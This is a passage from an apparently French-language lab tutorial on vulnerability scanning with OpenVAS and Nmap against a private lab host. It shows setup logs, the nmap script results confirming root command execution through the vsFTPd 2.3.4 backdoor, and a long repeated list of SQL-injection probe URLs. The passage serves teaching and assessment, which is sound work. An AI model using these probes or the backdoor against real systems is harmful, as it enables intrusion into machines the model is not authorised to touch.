/var/lib/gvm/feed-update.lock Acquired lock on /var/lib/gvm/feed-update.lock ⠴ Downloading SCAP data from rsync://feed.community.greenbone.net/community/vulnerability-feed/24.10/scap- data/ to /var/lib/gvm/scap-data ⠏ Downloading CERT-Bund data from rsync://feed.community.greenbone.net/community/vulnerability-feed/24.10/cert- data/ to /var/lib/gvm/cert-data ⠙ Downloading gvmd data from rsync://feed.community.greenbone.net/community/data-feed/24.10/ to /var/lib/gvm/data-objects/gvmd Releasing lock on /var/lib/gvm/feed-update.lock [*] Checking Default scanner 08b69003-5fc2-4037-a479-93b440211c73 OpenVAS /run/ospd/ospd-openvas.sock 0 OpenVAS Default [i] No need to alter default scanner [+] Done [*] Please note the password for the admin user [*] User created with password \u0026#39;7596e387-4d90-408a-aa5b-88eeaca1f5e4\u0026#39;. [\u0026gt;] You can now run gvm-check-setup to make sure everything is correctly configured Warning Noter le mot de passe qui est aléatoirement généré dans les logs.\nLancer la vérification de l\u0026rsquo;installation : sudo gvm-check-setup └─$ sudo gvm-check-setup [sudo] password for kali: gvm-check-setup 25.04.0 This script is provided and maintained by Debian and Kali. Test completeness and readiness of GVM-25.04.0 Step 1: Checking OpenVAS (Scanner)... OK: OpenVAS Scanner is present in version 23.45.1. OK: Notus Scanner is present in version 22.7.2. OK: Server CA Certificate is present as /var/lib/gvm/CA/servercert.pem. Checking permissions of /var/lib/openvas/gnupg/* OK: _gvm owns all files in /var/lib/openvas/gnupg OK: redis-server is present. OK: scanner (db_address setting) is configured properly using the redis-server socket: /var/run/redis-openvas/redis-server.sock OK: the mqtt_server_uri is defined in /etc/openvas/openvas.conf OK: _gvm owns all files in /var/lib/openvas/plugins OK: NVT collection in /var/lib/openvas/plugins contains 95089 NVTs. OK: The notus directory /var/lib/notus/products contains 517 NVTs. Checking that the obsolete redis database has been removed Could not connect to Redis at /var/run/redis-openvas/redis-server.sock: No such file or directory OK: No old Redis DB Starting ospd-openvas service Waiting for ospd-openvas service OK: ospd-openvas service is active. OK: ospd-OpenVAS is present in version 22.10.0. Step 2: Checking GVMD Manager ... OK: GVM Manager (gvmd) is present in version 26.24.0. Step 3: Checking Certificates ... OK: GVM client certificate is valid and present as /var/lib/gvm/CA/clientcert.pem. OK: Your GVM certificate infrastructure passed validation. Step 4: Checking data ... OK: SCAP data found in /var/lib/gvm/scap-data. OK: CERT data found in /var/lib/gvm/cert-data. Step 5: Checking Postgresql DB and user ... OK: Postgresql version and default port are OK. gvmd | _gvm | UTF8 | libc | en_US.UTF-8 | en_US.UTF-8 | | | 16437|pg-gvm|10|2200|f|22.6|| OK: At least one user exists. Step 6: Checking Greenbone Security Assistant (GSA) ... (gsad:93455): GLib-CRITICAL **: 11:10:18.461: g_file_get_contents: assertion \u0026#39;filename != NULL\u0026#39; failed OK: Greenbone Security Assistant is present in version Deamon 24.16.0~git. Step 7: Checking if GVM services are up and running ... Starting gvmd service Waiting for gvmd service OK: gvmd service is active. Starting gsad service Waiting for gsad service OK: gsad service is active. Step 8: Checking few other requirements... OK: nmap is present. OK: ssh-keygen found, LSC credential generation for GNU/Linux targets is likely to work. OK: nsis found, LSC credential package generation for Microsoft Windows targets is likely to work. OK: xsltproc found. WARNING: Your password policy is empty. SUGGEST: Edit the /etc/gvm/pwpolicy.conf file to set a password policy. Step 9: Checking greenbone-security-assistant... OK: greenbone-security-assistant is installed It seems like your GVM-25.04.0 installation is OK. Si besoin, lancer manuellement le service: sudo gvm-start\nIl est aussi possible, parfois de devoir relancer postgresql manuellement : sudo service postgresql start\nLancer la mise à jour manuelle des feeds : sudo greenbone-feed-sync\n3.2 Lancement du premier scan # Se connecter à l\u0026rsquo;interface web\nURL : https://127.0.0.1:9392 Username : admin Password : cf celui affiché dans les logs de gvm-setup Écran de connexion OepnVas avec login et mot de passe Configurer son premier scan Il est possible de voir le message Failed to create a new task because the default Scan Config is not available [...], cela veut dire que la synchronisation est toujours en cours. Il faut simplement attendre. Pour voir le statut de la mise à jour des feeds : Une fois la synchronisation des feeds terminés, et le premier scan créé, lancer l\u0026rsquo;analyse 3.3 Analyse des résultats # L\u0026rsquo;analyse prend du temps. Lorsqu\u0026rsquo;elle se termine, consulter le rapport, puis lister les CVEs. 4. Scan avec Nmap # Utiliser Nmap NSE pour l\u0026rsquo;identification des vulnérabilités nmap -script vuln ─$ sudo nmap -script vuln 172.16.211.128 Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-09 17:15 -0400 Nmap scan report for 172.16.211.128 Host is up (0.0017s latency). Not shown: 977 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp | ftp-vsftpd-backdoor: | VULNERABLE: | vsFTPd version 2.3.4 backdoor | State: VULNERABLE (Exploitable) | IDs: BID:48539 CVE:CVE-2011-2523 | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04. | Disclosure date: 2011-07-03 | Exploit results: | Shell command: id | Results: uid=0(root) gid=0(root) | References: | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523 | https://www.securityfocus.com/bid/48539 |_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the \u0026#34;POODLE\u0026#34; issue. | Disclosure date: 2014-10-14 | Check results: | TLS_RSA_WITH_AES_128_CBC_SHA | References: | https://www.securityfocus.com/bid/70574 | https://www.imperialviolet.org/2014/10/14/poodle.html | https://www.openssl.org/~bodo/ssl-poodle.pdf |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 |_sslv2-drown: ERROR: Script execution failed (use -d to debug) | ssl-dh-params: | VULNERABLE: | Anonymous Diffie-Hellman Key Exchange MitM Vulnerability | State: VULNERABLE | Transport Layer Security (TLS) services that use anonymous | Diffie-Hellman key exchange only provide protection against passive | eavesdropping, and are vulnerable to active man-in-the-middle attacks | which could completely compromise the confidentiality and integrity | of any data exchanged over the resulting session. | Check results: | ANONYMOUS DH GROUP 1 | Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA | Modulus Type: Safe prime | Modulus Source: Unknown/Custom-generated | Modulus Length: 512 | Generator Length: 8 | Public Key Length: 512 | References: | https://www.ietf.org/rfc/rfc2246.txt | | Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam) | State: VULNERABLE | IDs: BID:74733 CVE:CVE-2015-4000 | The Transport Layer Security (TLS) protocol contains a flaw that is | triggered when handling Diffie-Hellman key exchanges defined with | the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker | to downgrade the security of a TLS session to 512-bit export-grade | cryptography, which is significantly weaker, allowing the attacker | to more easily break the encryption and monitor or tamper with | the encrypted stream. | Disclosure date: 2015-5-19 | Check results: | EXPORT-GRADE DH GROUP 1 | Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA | Modulus Type: Safe prime | Modulus Source: Unknown/Custom-generated | Modulus Length: 512 | Generator Length: 8 | Public Key Length: 512 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000 | https://www.securityfocus.com/bid/74733 | https://weakdh.org | | Diffie-Hellman Key Exchange Insufficient Group Strength | State: VULNERABLE | Transport Layer Security (TLS) services that use Diffie-Hellman groups | of insufficient strength, especially those using one of a few commonly | shared groups, may be susceptible to passive eavesdropping attacks. | Check results: | WEAK DH GROUP 1 | Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA | Modulus Type: Safe prime | Modulus Source: postfix builtin | Modulus Length: 1024 | Generator Length: 8 | Public Key Length: 1024 | References: |_ https://weakdh.org | smtp-vuln-cve2010-4344: |_ The SMTP server is not Exim: NOT VULNERABLE 53/tcp open domain 80/tcp open http |_http-stored-xss: Couldn\u0026#39;t find any stored XSS vulnerabilities. |_http-trace: TRACE is enabled |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-dombased-xss: Couldn\u0026#39;t find any DOM based XSS. | http-sql-injection: | Possible sqli for queries: | http://172.16.211.128:80/dav/?C=N%3BO%3DD%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=S%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=M%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=D%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fvulnerabilities.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=php-errors.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=notes.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=usage-instructions.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?username=anonymous\u0026amp;page=password-generator.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider\u0026amp;page=home.php | http://172.16.211.128:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider\u0026amp;page=home.php | http://172.16.211.128:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=S%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=M%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=N%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=D%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=S%3BO%3DD%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=M%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=N%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=D%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=M%3BO%3DD%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=S%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=D%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=N%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=D%3BO%3DD%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=S%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=M%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/dav/?C=N%3BO%3DA%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider\u0026amp;page=change-log.htm | http://172.16.211.128:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fvulnerabilities.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?username=anonymous\u0026amp;page=password-generator.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider\u0026amp;page=change-log.htm | http://172.16.211.128:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fvulnerabilities.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?username=anonymous\u0026amp;page=password-generator.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fvulnerabilities.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=php-errors.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=notes.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=usage-instructions.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?username=anonymous\u0026amp;page=password-generator.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider\u0026amp;page=home.php | http://172.16.211.128:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider\u0026amp;page=home.php | http://172.16.211.128:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fvulnerabilities.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?username=anonymous\u0026amp;page=password-generator.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fvulnerabilities.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=documentation%2Fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?username=anonymous\u0026amp;page=password-generator.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=credits.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider | http://172.16.211.128:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider | 